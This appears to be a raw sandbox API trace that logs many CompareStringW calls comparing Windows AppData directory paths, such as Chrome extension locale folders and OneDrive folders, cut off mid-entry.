cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 3 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount2=73) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount2=73) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount2=73) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount2=73) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0290.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount1=140, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 2 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount2=130) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\", cchCount2=131) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\", cchCount2=131) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\", cchCount2=131) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\", cchCount2=131) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount1=140, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\", cchCount2=130) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\", cchCount2=130) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount2=130) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount2=130) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount2=130) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount1=140, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\", cchCount2=139) returned 1 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\", cchCount2=139) returned 3 [0290.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount1=140, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\", cchCount2=139) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\", cchCount2=139) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 